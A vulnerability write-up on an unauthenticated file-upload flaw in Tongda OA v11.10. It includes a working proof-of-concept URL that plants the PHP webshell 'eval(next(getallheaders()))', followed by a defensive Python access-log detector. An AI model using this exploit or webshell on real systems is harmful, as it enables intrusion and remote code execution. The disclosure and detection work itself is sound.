Tongda OA v11.10 has an unauthorized arbitrary file upload vulnerability

Official website: https://www.tongda2000.com/

Version: v11.10

  1. The actionGetdata() method is defined in general\appbuilder\modules\portal\controllers\GatewayController.php, and its activeTab parameter is controllable by the requester. On line 2018 the activeTab argument is passed into the GetData method.

[Image: WPS picture (1)]

The GetData() method looks up the id argument with findall to check whether a matching array exists; if the queried id does exist, execution enters the if statement on line 21. The $attribute argument on line 38 is therefore controllable, which allows the array to be closed and content to be written to a file via fwrite().

[Image: WPS picture (2)]

  2. Reproducing the vulnerability

PoC

http://url/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage

[Image: WPS picture (3)]

The request writes a PHP file with fwrite(fopen()) by closing the array, and bypasses the global filtering by using a payload that takes no parameter.

<?php eval(next(getallheaders()));

[Image: WPS picture (4)]

Write the 2.php file with no argument; the file contents are as follows.

[Image: WPS picture (5)]

[Image: WPS picture (6)]
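
For defenders, requests of the shape shown above can be found in web server access logs. The following is an added detection example, not code from the original write-up or from Tongda: it flags requests to the getdata endpoint whose decoded activeTab value contains code-like syntax. The log format (common/combined), the sample lines and the list of suspicious tokens are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the write-up above.
GETDATA_PATH = "/general/appbuilder/web/portal/gateway/getdata"
# Assumption: a legitimate tab name never needs quotes, "=>", "/*", ";"
# or a function-call shape such as name(...).
SUSPICIOUS = re.compile(r"""['"]|=>|/\*|;|\b\w+\s*\(""")
# Request field of a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; the second is shortened from the request
# shown above, with the function arguments elided as "...".
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0800] "GET /general/appbuilder/web/portal/gateway/getdata?activeTab=news&id=266&module=Carouselimage HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0800] "GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(...)%3b/*&id=266&module=Carouselimage HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0800] "GET /general/index.php?activeTab=%27 HTTP/1.1" 200 100',
]

def suspicious_active_tab(log_line):
    """Return the decoded activeTab value if the line is a getdata request
    whose activeTab contains code-like syntax, otherwise None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    # Lower-case the path: the server in the write-up runs on Windows.
    if url.path.rstrip("/").lower() != GETDATA_PATH:
        return None
    # errors="replace": a lone %e5 byte is not valid UTF-8 on its own.
    params = parse_qs(url.query, keep_blank_values=True, errors="replace")
    for value in params.get("activeTab", []):
        if SUSPICIOUS.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded activeTab) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_active_tab(line)
        if value is not None:
            hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious activeTab = {value!r}")
```

A hit is a reason to review the web root under general/ for PHP files that are not part of the installation.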